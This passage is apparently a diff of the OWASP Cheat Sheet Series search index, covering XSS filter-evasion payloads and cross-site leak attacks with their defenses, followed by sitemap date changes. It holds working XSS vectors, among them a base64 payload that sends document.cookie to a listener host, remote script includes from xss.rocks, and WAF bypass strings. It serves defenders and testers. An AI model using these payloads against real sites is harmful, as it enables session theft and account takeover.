<EMBED\u00a0SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH\u00a0A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv\u00a0MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs\u00a0aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\u00a0IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh\u00a0TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"\u00a0type=\"image/svg+xml\"\u00a0AllowScriptAccess=\"always\"></EMBED>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#using-actionscript-inside-flash-for-obfuscation","title":"Using ActionScript Inside Flash for Obfuscation","text":"
a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"alert('XSS');\\\")\"; \neval(a+b+c+d);\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xml-data-island-with-cdata-obfuscation","title":"XML Data Island with CDATA Obfuscation","text":"

This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:

<XML\u00a0ID=\"xss\"><I><B><IMG\u00a0SRC=\"javas<!--\u00a0-->cript:alert('XSS')\"></B></I></XML> \n<SPAN\u00a0DATASRC=\"#xss\"\u00a0DATAFLD=\"B\"\u00a0DATAFORMATAS=\"HTML\"></SPAN>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#locally-hosted-xml-with-embedded-javascript-that-is-generated-using-an-xml-data-island","title":"Locally hosted XML with embedded JavaScript that is generated using an XML data island","text":"

This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:

<XML\u00a0SRC=\"xsstest.xml\"\u00a0ID=I></XML>  \n<SPAN\u00a0DATASRC=#I\u00a0DATAFLD=C\u00a0DATAFORMATAS=HTML></SPAN>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#htmltime-in-xml","title":"HTML+TIME in XML","text":"

This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:

<HTML><BODY>\n<?xml:namespace\u00a0prefix=\"t\"\u00a0ns=\"urn:schemas-microsoft-com:time\">\n<?import\u00a0namespace=\"t\"\u00a0implementation=\"#default#time2\">\n<t:set\u00a0attributeName=\"innerHTML\"\u00a0to=\"XSS<SCRIPT\u00a0DEFER>alert(\"XSS\")</SCRIPT>\">\n</BODY></HTML>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#assuming-you-can-only-fit-in-a-few-characters-and-it-filters-against-js","title":"Assuming you can only fit in a few characters and it filters against .js","text":"

You can rename your JavaScript file to an image as an XSS vector:

<SCRIPT\u00a0SRC=\"http://xss.rocks/xss.jpg\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ssi-server-side-includes","title":"SSI (Server Side Includes)","text":"

This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:

<!--#exec\u00a0cmd=\"/bin/echo\u00a0'<SCR'\"--><!--#exec\u00a0cmd=\"/bin/echo\u00a0'IPT\u00a0SRC=http://xss.rocks/xss.js></SCRIPT>'\"-->

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#php","title":"PHP","text":"

Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:

<?\u00a0echo('<SCR)';\necho('IPT>alert(\"XSS\")</SCRIPT>');\u00a0?>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-embedded-commands","title":"IMG Embedded Commands","text":"

This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:

<IMG\u00a0SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-embedded-commands-part-ii","title":"IMG Embedded Commands part II","text":"

This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=\"httx://badguy.com/a.jpg\"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):

Redirect\u00a0302\u00a0/a.jpg\u00a0http://victimsite.com/admin.asp&deleteuser

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#cookie-manipulation","title":"Cookie Manipulation","text":"

Admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):

<META\u00a0HTTP-EQUIV=\"Set-Cookie\"\u00a0Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#utf-7-encoding","title":"UTF-7 Encoding","text":"

If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:

<HEAD><META\u00a0HTTP-EQUIV=\"CONTENT-TYPE\"\u00a0CONTENT=\"text/html;\u00a0charset=UTF-7\">\u00a0</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-using-html-quote-encapsulation","title":"XSS Using HTML Quote Encapsulation","text":"

This was tested in IE, your mileage may vary. For performing XSS on sites that allow <SCRIPT> but don't allow <SCRIPT SRC... by way of a regex filter /\\<script\\[^\\>\\]+src/i:

<SCRIPT\u00a0a=\">\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

For performing XSS on sites that allow <SCRIPT> but don't allow \\<script src... by way of a regex filter /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i (this is an important one, because I've seen this regex in the wild):

<SCRIPT\u00a0=\">\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i:

<SCRIPT\u00a0a=\">\"\u00a0''\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Yet another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i. I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT> tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):

<SCRIPT\u00a0\"a='>'\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

And one last XSS attack to evade, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i using grave accents (again, doesn't work in Firefox):

<SCRIPT\u00a0a=>SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:

<SCRIPT\u00a0a=\">'>\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:

<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#url-string-evasion","title":"URL String Evasion","text":"

Assuming http://www.google.com/ is programmatically disallowed:

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ip-versus-hostname","title":"IP Versus Hostname","text":"

<A\u00a0HREF=\"http://66.102.7.147/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#url-encoding","title":"URL Encoding","text":"

<A\u00a0HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#dword-encoding","title":"DWORD Encoding","text":"

Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details:

<A\u00a0HREF=\"http://1113982867/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#hex-encoding","title":"Hex Encoding","text":"

The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):

<A\u00a0HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#octal-encoding","title":"Octal Encoding","text":"

Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:

<A\u00a0HREF=\"http://0102.0146.0007.00000223/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#base64-encoding","title":"Base64 Encoding","text":"

<img\u00a0onload=\"eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#mixed-encoding","title":"Mixed Encoding","text":"

Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:

<A\u00a0HREF=\"h \ntt\u00a0\u00a0p://6   6.000146.0x7.147/\">XSS</A>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#protocol-resolution-bypass","title":"Protocol Resolution Bypass","text":"

// translates to http:// which saves a few more bytes. This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like (ht|f)tp(s)?:// (thanks to Ozh for part of this one). You can also change the // to \\\\\\\\. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.

<A\u00a0HREF=\"//www.google.com/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-1","title":"Google \"feeling lucky\" part 1","text":"

Firefox uses Google's \"feeling lucky\" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's keyword: protocol. You can concatenate several keywords by using something like the following keyword:XSS+RSnake for instance. This no longer works within Firefox as of 2.0.

<A\u00a0HREF=\"//google\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-2","title":"Google \"feeling lucky\" part 2","text":"

This uses a very tiny trick that appears to work Firefox only, because of it's implementation of the \"feeling lucky\" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:

<A\u00a0HREF=\"http://ha.ckers.org@google\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-3","title":"Google \"feeling lucky\" part 3","text":"

This uses a malformed URL that appears to work in Firefox and Opera only, because of their implementation of the \"feeling lucky\" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case \"google\"):

<A\u00a0HREF=\"http://google:ha.ckers.org\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#removing-cnames","title":"Removing CNAMEs","text":"

When combined with the above URL, removing www. will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):

<A\u00a0HREF=\"http://google.com/\">XSS</A>

Extra dot for absolute DNS:

<A\u00a0HREF=\"http://www.google.com./\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#javascript-link-location","title":"JavaScript Link Location","text":"

<A\u00a0HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-replace-as-attack-vector","title":"Content Replace as Attack Vector","text":"

Assuming http://www.google.com/ is programmatically replaced with nothing). I actually used a similar attack vector against several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: java&\\#x09;script: was converted into java script:, which renders in IE, Netscape 8.1+ in secure site mode and Opera):

<A\u00a0HREF=\"http://www.google.com/ogle.com/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#assisting-xss-with-http-parameter-pollution","title":"Assisting XSS with HTTP Parameter Pollution","text":"

Assume a content sharing flow on a web site is implemented as shown below. There is a \"Content\" page which includes some content provided by users and this page also includes a link to \"Share\" page which enables a user choose their favorite social sharing platform to share it on. Developers HTML encoded the \"title\" parameter in the \"Content\" page to prevent against XSS but for some reasons they didn't URL encoded this parameter to prevent from HTTP Parameter Pollution. Finally they decide that since content_type's value is a constant and will always be integer, they didn't encode or validate the content_type in the \"Share\" page.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-page-source-code","title":"Content Page Source Code","text":"

a href=\"/Share?content_type=1&title=<%=Encode.forHtmlAttribute(untrusted content title)%>\">Share</a>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#share-page-source-code","title":"Share Page Source Code","text":"
<script>\nvar contentType = <%=Request.getParameter(\"content_type\")%>;\nvar title = \"<%=Encode.forJavaScript(request.getParameter(\"title\"))%>\";\n...\n//some user agreement and sending to server logic might be here\n...\n</script>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-page-output","title":"Content Page Output","text":"

In this case if attacker set untrusted content title as \u201cThis is a regular title&content_type=1;alert(1)\u201d the link in \"Content\" page would be this:

<a href=\"/share?content_type=1&title=This is a regular title&amp;content_type=1;alert(1)\">Share</a>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#share-page-output","title":"Share Page Output","text":"

And in share page output could be this:

<script>\nvar contentType = 1; alert(1);\nvar title = \"This is a regular title\";\n\u2026\n//some user agreement and sending to server logic might be here\n\u2026\n</script>\n

As a result, in this example the main flaw is trusting the content_type in the \"Share\" page without proper encoding or validation. HTTP Parameter Pollution could increase impact of the XSS flaw by promoting it from a reflected XSS to a stored XSS.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#character-escape-sequences","title":"Character Escape Sequences","text":"

All the possible combinations of the character \"\\<\" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#methods-to-bypass-waf-cross-site-scripting","title":"Methods to Bypass WAF \u2013 Cross-Site Scripting","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#general-issues","title":"General issues","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#stored-xss","title":"Stored XSS","text":"

If an attacker managed to push XSS through the filter, WAF wouldn\u2019t be able to prevent the attack conduction.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#reflected-xss-in-javascript","title":"Reflected XSS in JavaScript","text":"
Example: <script> ... setTimeout(\\\\\"writetitle()\\\\\",$\\_GET\\[xss\\]) ... </script>\nExploitation:\u00a0/?xss=500);\u00a0alert(document.cookie);//\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#dom-based-xss","title":"DOM-based XSS","text":"
Example:\u00a0<script> ... eval($\\_GET\\[xss\\]); ... </script>\nExploitation:\u00a0/?xss=document.cookie\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-via-request-redirection","title":"XSS via request Redirection","text":"
...\nheader('Location:\u00a0'.$_GET['param']);\n...\n

As well as:

..\nheader('Refresh:\u00a00;\u00a0URL='.$_GET['param']); \n...\n

/?param=<javascript:alert(document.cookie>)

/?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#waf-bypass-strings-for-xss","title":"WAF ByPass Strings for XSS","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#filter-bypass-alert-obfuscation","title":"Filter Bypass Alert Obfuscation","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html","title":"Cross-site leaks Cheat Sheet","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article describes examples of attacks and defenses against cross-site leaks vulnerability (XS Leaks). Since this vulnerability is based on the core mechanism of modern web browsers, it's also called a browser side-channel attack. XS-Leaks attacks seek to exploit the fact of seemingly insignificant information that is exchanged in cross-site communications between sites. This information infers answers to the previously asked questions about the victim's user account. Please take a look at the examples provided below:

On the basis of such questions, the attacker might try to deduce the answers, depending on the application's context. In most cases, the answers will be in binary form (yes or no). The impact of this vulnerability depends strongly on the application's risk profile. Despite this, XS Leaks may pose a real threat to user privacy and anonymity.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attack-vector","title":"Attack vector","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#same-origin-policy-sop","title":"Same Origin Policy (SOP)","text":"

Before describing attacks, it's good to understand one of the most critical security mechanisms in browsers - The Same-origin Policy. A few key aspects:

Origin A Origin B Same origin? https://example.com http://sub.example.com No, different hosts https://example.com https://example.com:443 Yes! Implicit port in Origin A

Although the SOP principle protects us from accessing information in cross-origin communication, XS-Leaks attacks based on residual data can infer some information.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#samesite-cookies","title":"SameSite Cookies","text":"

The SameSite attribute of a cookie tells the browser whether it should include the cookie in the request from the other site. The SameSite attribute takes the following values:

It is worth mentioning here the attitude of Chromium based browsers in which cookies without SameSite attribute set by default are treated as Lax.

SameSite cookies are a strong defense-in-depth mechanism against some classes of XS Leaks and CSRF attacks, which can significantly reduce the attack surface, but may not completely cut them (see, e.g., window-based XS Leak attacks like frame counting and navigation).

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#how-do-we-know-that-two-sites-are-samesite","title":"How do we know that two sites are SameSite?","text":"

In the context of the SameSite attribute, we consider the site to be the combination of the TLD (top-level domain) and the domain name before it. For example:

Full URL Site (eTLD+1) https://example.com:443/data?query=test example.com

Why are we talking about eTLD+1 and not just TLD+1? It's because of domains like .github.io or .eu.org. Such parts are not atomic enough to be compared well. For this reason, a list of \"effective\" TLDs (eTLDs) was created and can be found here.

Sites that have the same eTLD+1 are considered SameSite, examples:

Origin A Origin B SameSite? https://example.com http://example.com Yes, schemes don't matter https://evil.net https://example.com No, different eTLD+1 https://sub.example.com https://data.example.com Yes, subdomains don't matter

For more information about SameSite, see the excellent article Understanding \"same-site\".

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-using-the-element-id-attribute","title":"Attacks using the element ID attribute","text":"

Elements in the DOM can have an ID attribute that is unique within the document. For example:

<button id=\"pro\">Pro account</button>\n

The browser will automatically focus on an element with a given ID if we append a hash to the URL, e.g. https://example.com#pro. What's more, the JavaScript focus event gets fired. The attacker may try to embed the application in the iframe with specific source on its own controlled page:

then add listener in main document for blur event (the opposite of focus). When the victim visits the attackers site, the blur event gets fired. The attacker will be able to conclude that the victim has a pro account.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#framing-protection","title":"Framing protection","text":"

If you don't need other origins to embed your application in a frame, you can consider using one of two mechanisms:

Setting up framing protection efficiently blocks the ability to embed your application in a frame on the attacker-controlled origin and protects from other attacks like Clickjacking.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata-sec-fetch-dest","title":"Fetch metadata (Sec-Fetch-Dest)","text":"

Sec-Fetch-Dest header provides us with a piece of information about what is the end goal of the request. This header is included automatically by the browser and is one of the headers within the Fetch Metadata standard.

With Sec-Fetch-Dest you can build effective own resource isolation policies, for example:

app.get('/', (req, res) => {\nif (req.get('Sec-Fetch-Dest') === 'iframe') {\nreturn res.sendStatus(403);\n}\nres.send({\nmessage: 'Hello!'\n});\n});\n

If you want to use headers from the Fetch Metadata standard, make sure that your users' browsers support this standard (you can check it here). Also, think about using the appropriate fallback in code if the Sec-Fetch-* header is not included in the request.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-based-on-error-events","title":"Attacks based on error events","text":"

Embedding from resources from other origins is generally allowed. For example, you can embed an image from another origin or even script on your page. What is not permitted is reading cross-origin resource due the SOP policy.

When the browser sends a request for a resource, the server processes the request and decides on the response e.g. (200 OK or 404 NOT FOUND). The browser receives the HTTP response and based on that, the appropriate JavaScript event is fired (onload or onerror).

In this way, we can try to load resources and, based on the response status, infer whether they exist or not in the context of the logged-in victim. Let's look at the following situation:

Given the above example, an attacker can use JavaScript on his controlled origin to guess the victim's ID by enumerating over all the values in a simple loop.

function checkId(id) {\nconst script = document.createElement('script');\nscript.src = `https://example.com/api/users/${id}`;\nscript.onload = () => {\nconsole.log(`Logged user id: ${id}`);\n};\ndocument.body.appendChild(script);\n}\n\n// Generate array [0, 1, ..., 40]\nconst ids = Array(41)\n.fill()\n.map((_, i) => i + 0);\n\nfor (const id of ids) {\ncheckId(id);\n}\n

Note that the attacker here does not care about reading the response body even though it would not be able to due to solid isolation mechanisms in browsers such as Cross-Origin Resource Blocking. All it needs is the success information it receives when the onload event fires.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_1","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#subresource-protection","title":"SubResource protection","text":"

In some cases, mechanism of special unique tokens may be implemented to protect our sensitive endpoints.

/api/users/1234?token=be930b8cfb5011eb9a030242ac130003\n

Although it is pretty effective, the solution generates a significant overhead in proper implementation.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata-sec-fetch-site","title":"Fetch metadata (Sec-Fetch-Site)","text":"

This header specifies where the request was sent from, and it takes the following values:

Like Sec-Fetch-Dest, this header is automatically appended by the browser to each request and is part of the Fetch Metadata standard. Example usage:

app.get('/api/users/:id', authorization, (req, res) => {\nif (req.get('Sec-Fetch-Site') === 'cross-site') {\nreturn res.sendStatus(403);\n}\n\n// ... more code\n\nreturn res.send({ id: 1234, name: 'John', role: 'admin' });\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#cross-origin-resource-policy-corp","title":"Cross-Origin-Resource-Policy (CORP)","text":"

If the server returns this header with the appropriate value, the browser will not load resources from our site or origin (even static images) in another application. Possible values:

Read more about CORP here.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-on-postmessage-communication","title":"Attacks on postMessage communication","text":"

Sometimes in controlled situations we would like, despite SOP, to exchange information between different origins. We can use the postMessage mechanism. See below example:

// Origin: http://example.com\nconst site = new URLSearchParams(window.location.search).get('site'); // https://evil.com\nconst popup = window.open(site);\npopup.postMessage('secret message!', '*');\n\n// Origin: https://evil.com\nwindow.addEventListener('message', e => {\nalert(e.data) // secret message! - leak\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_2","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#specify-strict-targetorigin","title":"Specify strict targetOrigin","text":"

To avoid situations like the one above, where an attacker manages to get the reference for a window to receive a message, always specify the exact targetOrigin in postMessage. Passing to the targetOrigin wildcard * causes any origin to receive the message.

// Origin: http://example.com\nconst site = new URLSearchParams(window.location.search).get('site'); // https://evil.com\nconst popup = window.open(site);\npopup.postMessage('secret message!', 'https://sub.example.com');\n\n// Origin: https://evil.com\nwindow.addEventListener('message', e => {\nalert(e.data) // no data!\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#frame-counting-attacks","title":"Frame counting attacks","text":"

Information about the number of loaded frames in a window can be a source of leakage. Take for example an application that loads search results into a frame, if the results are empty then the frame does not appear.

An attacker can get information about the number of loaded frames in a window by counting the number of frames in a window.frames object.

So finally, an attacker can obtain the email list and, in a simple loop, open subsequent windows and count the number of frames. If the number of frames in the opened window is equal to 1, the email is in the client's database of the application used by the victim.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_3","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#cross-origin-opener-policy-coop","title":"Cross-Origin-Opener-Policy (COOP)","text":"

Setting this header will prevent cross-origin documents from opening in the same browsing context group. This solution ensures that document A opening another document will not have access to the window object. Possible values:

In case the server returns for example same-origin COOP header, the attack fails:

const win = window.open('https://example.com/admin/customers?search=john%40example.com');\nconsole.log(win.frames.length) // Cannot read property 'length' of null\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-using-browser-cache","title":"Attacks using browser cache","text":"

Browser cache helps to significantly reduce the time it takes for a page to load when revisited. However, it can also pose a risk of information leakage. If an attacker is able to detect whether a resource was loaded from the cache after the load time, he will be able to draw some conclusions based on it.

The principle is simple, a resource loaded from cache memory will load incomparably faster than from the server.

An attacker can embed a resource on their site that is only accessible to a user with the admin role. Then, using JavaScript, read the load time of a particular resource and, based on this information, deduce whether the resource is in cache or not.

    // Threshold above which we consider a resource to have loaded from the server\n// const THRESHOLD = ...\n\nconst adminImagePerfEntry = window.performance\n.getEntries()\n.filter((entry) => entry.name.endsWith('admin.svg'));\n\nif (adminImagePerfEntry.duration < THRESHOLD) {\nconsole.log('Image loaded from cache!')\n}\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_4","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#unpredictable-tokens-for-images","title":"Unpredictable tokens for images","text":"

This technique is accurate when the user wants the resources to still be cached, while an attacker will not be able to find out about it.

/avatars/admin.svg?token=be930b8cfb5011eb9a030242ac130003\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#using-the-cache-control-header","title":"Using the Cache-Control header","text":"

You can disable the cache mechanism if you accept the degraded performance related to the necessity of reloading resources from the server every time a user visits the site. To disable caching for resources you want to protect, set the response header Cache-Control: no-store.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#quick-recommendations","title":"Quick recommendations","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#xs-leaks","title":"XS Leaks","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata","title":"Fetch Metadata","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#framing-protection_1","title":"Framing protection","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#samesite","title":"SameSite","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#coop-and-corp-header","title":"COOP and CORP header","text":""}]} \ No newline at end of file diff --git a/sitemap.xml b/sitemap.xml index aa7c6b7cf3..0e0532f32c 100644 --- a/sitemap.xml +++ b/sitemap.xml @@ -2,457 +2,457 @@ https://cheatsheetseries.owasp.org/index.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/Glossary.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/IndexASVS.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/IndexMASVS.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/IndexProactiveControls.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/IndexTopTen.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/AJAX_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Abuse_Case_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html - 2023-07-07 + 